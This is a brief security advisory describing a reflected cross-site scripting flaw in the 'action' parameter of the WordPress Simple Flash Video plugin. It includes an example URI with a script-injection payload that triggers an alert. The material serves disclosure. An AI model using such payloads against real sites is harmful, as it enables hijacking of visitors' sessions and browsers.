WordPress Simple Flash Video Plugin 'action' Parameter Cross Site Scripting Vulnerability

WordPress Simple Flash Video Plugin 'action' Parameter Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/wp-content/plugins/simple-flash-video/stats/?action="/><script>alert(1);</script>